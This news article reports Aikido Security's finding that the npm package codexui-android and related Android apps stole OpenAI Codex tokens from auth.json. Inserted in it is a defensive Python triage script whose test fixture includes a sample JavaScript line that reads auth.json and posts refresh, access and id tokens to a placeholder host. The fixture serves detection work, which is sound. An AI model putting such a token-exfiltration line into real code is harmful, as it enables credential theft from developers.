
27,000-Download Codex UI Tool Secretly Stole OpenAI Refresh Tokens


A popular software tool used by hundreds of mobile developers has been found stealing authentication tokens. On 27 May 2026, Aikido Security shared research with Hackread.com about a malicious npm package called codexui-android.

For context, it is a highly popular remote web user interface for OpenAI Codex, an artificial intelligence (AI) model that writes code, gathering roughly 27,000 weekly downloads.

Aikido Security's researcher, Charlie Eriksen, found that this package ran a supply chain attack last month to steal user data.

Hiding in Plain Sight

Interestingly, the attackers didn't use standard tricks like typosquatting or account hijacking; instead, they developed a genuinely useful tool. This was most likely done to build a real user base before weaponising it. Moreover, the malicious code does not exist in the public GitHub repository and only appears in the published npm package. This means a standard source code audit would definitely miss it.

The attack triggers immediately at module load. The very first line of dist-cli/index.js imports a hidden script named chunk-PUR7OUAG.js. It quickly checks for local credentials. If found, a data exfiltration routine is launched to steal the access_token, id_token, account ID and refresh_token from the auth.json file. More problematic is that a refresh_token doesn't expire; hence, the attackers can impersonate the victim indefinitely.

To hide the network traffic, the code sends the stolen data to a server endpoint named sentry.anyclawstore. This was chosen deliberately to blend in with normal Sentry error-reporting telemetry. Inside the hidden source map, the author even left a clear comment: "Send tokens to our startlog endpoint (always)".
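A defender-side triage of what a published npm tarball actually ships, looking for the pattern just described (an entry file whose import pulls in a chunk that reads auth.json and posts token fields to an outbound endpoint). This is an added example, not Aikido's tooling or any code from the package; the chunk name, endpoint and credential path in the fixture are placeholders.

```python
import json
import posixpath
import re

TOKEN_FIELDS = ("refresh_token", "access_token", "id_token")
# outbound-request primitives commonly seen in Node code
NETWORK_RE = re.compile(r"\b(?:fetch|https?\.request|axios\.[a-z]+)\s*\(")
# static relative imports/requires, e.g. import "./chunk-XXXX.js" or require("./x")
IMPORT_RE = re.compile(r"""(?:import\s+(?:[^'";]*from\s+)?|require\(\s*)['"](\.[^'"]+)['"]""")

def flag_file(src: str) -> list:
    """Return the signals present in one JS source file."""
    reasons = []
    if "auth.json" in src:
        reasons.append("reads auth.json")
    hits = [f for f in TOKEN_FIELDS if f in src]
    if len(hits) >= 2:
        reasons.append("references " + ", ".join(hits))
    if NETWORK_RE.search(src):
        reasons.append("makes an outbound request")
    return reasons

def triage(files: dict) -> dict:
    """files maps package-relative path -> source text of the published tarball (not the
    git repo). A file is reported only when all three signals co-occur; load_time marks
    files imported directly by the entry point, i.e. code that runs on module load."""
    pkg = json.loads(files["package.json"])
    entry = posixpath.normpath(pkg.get("main") or next(iter((pkg.get("bin") or {}).values()), ""))
    findings = {}
    for path, src in files.items():
        reasons = flag_file(src) if path.endswith(".js") else []
        if len(reasons) == 3:
            findings[path] = {"reasons": reasons, "load_time": False}
    for m in IMPORT_RE.finditer(files.get(entry, "")):
        target = posixpath.normpath(posixpath.join(posixpath.dirname(entry), m.group(1)))
        if target in findings:
            findings[target]["load_time"] = True
    return findings

# Constructed fixture modelled on the pattern in the article; names and endpoint are placeholders.
SAMPLE = {
    "package.json": json.dumps({"name": "example-pkg", "bin": {"example": "dist-cli/index.js"}}),
    "dist-cli/index.js": 'import "./chunk-PLACEHOLDER.js";\nimport { serve } from "./server.js";\nserve();\n',
    "dist-cli/chunk-PLACEHOLDER.js": 'const c = JSON.parse(readFileSync("auth.json", "utf8"));\n'
        'fetch("https://sentry.example.invalid/log", { method: "POST", body: JSON.stringify('
        '{ refresh_token: c.refresh_token, access_token: c.access_token, id_token: c.id_token }) });\n',
    "dist-cli/server.js": 'export function serve() { return fetch("https://api.example.invalid/x"); }\n',
}

if __name__ == "__main__":
    print(json.dumps(triage(SAMPLE), indent=2))
```

Point `triage` at the unpacked output of `npm pack` rather than the git checkout, since that is where the article says the malicious chunk lives.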

Targeting Mobile Devices

Researchers noted in the blog post that this threat actor also targets Android mobile devices. The author published apps on the Google Play Store under the developer ID BrutalStrike, who also owns a legitimate mobile game with over 5 million downloads.

Two specific apps, a paid productivity app called codex.app and another called "OpenClaw Codex Claude AI Agent", contain the same malicious infrastructure.

Source: Aikido Security

The Android apps easily pass Google's pre-publish security scans because the initial 26 MB APK file looks completely clean. Once installed, the app extracts a Termux-derived Linux userland into private storage and launches Node.js using PRoot. It then runs a command to install the latest version of the npm package: pnpm add codexui-android@latest. The exfiltration has been active since version [email protected].

When Eriksen confronted the author, they briefly posted a comment claiming they had lost access to their npm account. They deleted it shortly after, replacing it with a corporate statement denying any credential theft.

As of today, the malicious software package and the apps are still live online.

"AI developer tooling is becoming a high-value target precisely because the tokens are powerful and long-lived… a threat actor invested real effort into building a credible, useful project to use as cover. The legitimacy is the attack vector. As AI tools proliferate and developers reach for productivity shortcuts, expect more of this," researchers concluded.
